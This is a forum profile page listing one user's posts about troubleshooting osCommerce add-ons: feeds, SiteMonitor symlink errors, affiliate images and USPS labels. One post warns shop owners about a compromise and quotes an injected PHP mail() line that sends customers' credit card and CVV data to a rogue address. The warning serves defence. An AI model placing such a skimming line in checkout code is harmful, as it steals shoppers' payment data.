Jump to content
Latest News: (loading..)

tonymazz

Members
  • Content count

    65
  • Joined

  • Last visited

1 Follower

Profile Information

Recent Profile Visitors

6,176 profile views
  1. If you want it to show in subcategories, either specify the cat id or use enter ALL. When adding or updating extra fields, put the desired categories id in the Category field, followed by a COMMA. The trailing COMMA is important, you need to add it after each category id even if you only write one category! If you want to have a field that will be used for all products, write "all" and nothing else. If you have subcate- gories, you can also put parent categories id here, the field will show up in all subcategories as well.
  2. tonymazz

    The Feedmachine Solution

    On your first issue, try this, 'price' => array('output' => 'FINAL_PRICE_WITHOUT_TAX', 'type' => 'KEYWORD' I did and I now get the exact price including special if applicable.
  3. tonymazz

    The Feedmachine Solution

    Hi! I too need assistance with Shopzilla's field limits. Your efforts are appreciated.
  4. tonymazz

    The Feedmachine Solution

    Hi! Thanks for the contribution. Seems to be working fine until I disable a category using the contribution DISABLE/ENABLE CATEGORIES at http://addons.oscommerce.com/info/6462 . Have you run into this and is there a way for me to ignore the categories I have disabled.? Thanks in advance for all of your efforts. BR, Tony...
  5. tonymazz

    SiteMonitor

    I am on the same server with different accounts. One account is fine, the Site Monitor works great, as well does the Hacker Code portion. However when i try the same thing in the other account which has all data directories linked. The osCommerce files are not linked and are what I want to monitor with this contribution like I do on the main account. I was hoping to do this with all of my stores. They all link back (just like public_html & www) to the main account files. In each instance the osCommerce files are unique & not linked. My problem is on each of those linked directories I get the error codes as follows: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 256 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 And then it craps out. It does not seem to want to ignore the linked directories. Thanks
  6. tonymazz

    SiteMonitor

    Hi again; I found this code to exclude a file, would this work on directories, as well? I have tried a couple variations with no luck. Here is the error I am getting for each directory that is linked: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/XXXSSS/public_html/mannix (errno=13 - Permission denied) in /home/XXXSSS/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Thanks again...
  7. tonymazz

    SiteMonitor

    Hi Jack; along the lines of the directories to be ignored. I have one site that is mostly symbolic links. Is there a way to ignore them? Thanks for your efforts on this contribution.
  8. tonymazz

    SiteMonitor

    Hi! Thanks for a great contribution. Need a little help. I have this working great on my base shop, but when I try ti use it on a different shop that utilizes a great deal of 'symbolic links', I get a string of errors for each linked directory. Like this: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/catalog/public_html/manuals/manuals (errno=13 - Permission denied) in /home/catalog/public_html/admin/includes/functions/sitemonitor_functions.php on line 174 I tried excluding the linked directories without success. Has anyone come across a 'work-around' for this? Thanks again!
  9. tonymazz

    Authorize.net is down

    Not sure if this is related to the Authorize.net outage. When I was alerted that the credit card transactions were not processing, I started looking into the pages that were hanging up. Inspect these files: checkout_payment.php, checkout_confirmation.php, checkout_process.php . Verify that there is no added scripts which will email the CC info to a rogue address. I found this on 2 sites I maintain so far. Both using heavily modded versions of OsCommerce 2.2. Be sure to remove this code. The line of code that instructs it to mail the vital info is something like this: mail("rogue.email@public_email.com","Cvv - Site $site!",$message123,$headers123)
  10. tonymazz

    OSC-Affiliate

    Hi! Thanks for the reply & PM pizza. I tried your suggestions with no differences. I did finally get the images to work, however I had to create a new directory for my images and place a copy of each of my images in to it. Basically when I debugged it I found that the show banner is not placing the / between the 2 directories. For example /catalog/images - becomes catalogimages. So by creating a new image folder named catalogimages the problem is solved for now. Does anyone know how to correct this without changing the main configure file. When I change the main configure file none of the images work on the site at all. Thanks again, Tony...
  11. tonymazz

    OSC-Affiliate

    Have you found a solution to the images not showing up yet? I too am having that issue. Any help is appreciated
  12. Anyone figure the solution out for this, as I too am having the same issue...
  13. tonymazz

    USPS Labels not working

    Thanks for your efforts on this. I have been away & have not had any time to work on this. In reading on one of your prior posts regarding Contribution. My recommendation is this: If you just are making changes to the existing scripts & the overall functionality remains the same = Revision (take it up to the next whole integar to show it is a major revision vs a small revision typically would be a decimal place) When you release the International portion and after being tested by the community, you should then make it a new contribution since (especially since some folks won't be using the International). That's my 2 cents. But most importantly to say thanks for your time & efferts. T...
  14. tonymazz

    USPS Labels not working

    Do you have a value in the tare weight setting? Its in Admin>Configuration>Shipping/Packaging
×